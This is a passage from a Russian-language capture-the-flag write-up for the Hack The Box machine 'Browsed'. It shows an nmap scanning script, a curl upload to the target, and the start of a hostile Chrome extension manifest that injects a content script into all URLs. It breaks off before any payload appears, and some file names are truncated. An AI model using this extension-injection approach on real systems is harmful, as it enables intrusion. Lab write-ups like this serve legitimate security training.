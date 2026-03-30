Наша конечная цель — получить права суперпользователя на машине Browsed с учебной площадки Hack The Box. Уровень сложности — средний.
Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
У этой машины случайно выданный IP-адрес 10.129.244.79, который я добавляю в
/, чтобы обращаться к этому хосту по имени.
10.129.244.79 browsed.htb
Запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг в любой атаке. Оно позволяет злоумышленнику узнать, какие службы на хосте принимают соединения. На основе этой информации он выбирает следующий шаг, чтобы получить точку входа.
Самый известный инструмент для сканирования — Nmap. Улучшить результаты его работы поможет следующий скрипт:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '' ',' | sed s/,$//)nmap -p$ports -A $1
Он работает в два этапа. Сначала запускается быстрое сканирование, затем — более тщательное, с помощью встроенных скриптов (опция
-A).
Подробнее о работе с Nmap читай в статье «Nmap с самого начала. Осваиваем разведку и сканирование сети».
Сканер нашел два открытых порта:
- 22 — OpenSSH 9.6p1;
- 80 — веб‑сервер Nginx 1.24.0.
На главной странице сайта нас встречает платформа для тестирования расширений браузера Chrome.
Точка входа
На странице Samples можно скачать несколько расширений.
Скачиваем первый файл и смотрим, что внутри архива.
Наибольший интерес представляет файл
manifest. — конфиг расширения Chrome. В нем хранятся метаданные, а также описаны его структура и разрешения.
Параметр
matches:
< означает, что
content. будет выполняться на любом сайте. Этот манифест можно использовать как шаблон для своего расширения, но сначала перейдем на страницу загрузки на сервер расширений и загрузим скачанный файл.
Помимо логов тестирования, важную информацию дает и ответ сервера. Так мы узнаем, что домен
browsedinternals. соответствует
localhost.
curl -F "extension=@fontify.zip;type=application/zip" http://browsed.htb/upload.php
Точка опоры
Сделаем свое расширение из двух файлов: манифеста
Expl и скрипта на JavaScript.
{ "manifest_version": 3, "name": "Expl", "version": "1.0.0", "description": "Expl", "permissions": ["scripting"], "content_scripts": [ { "matches": [ "<all_urls>" ], "js": [ "content.js" ], "run_at": "document_idle" } ]}
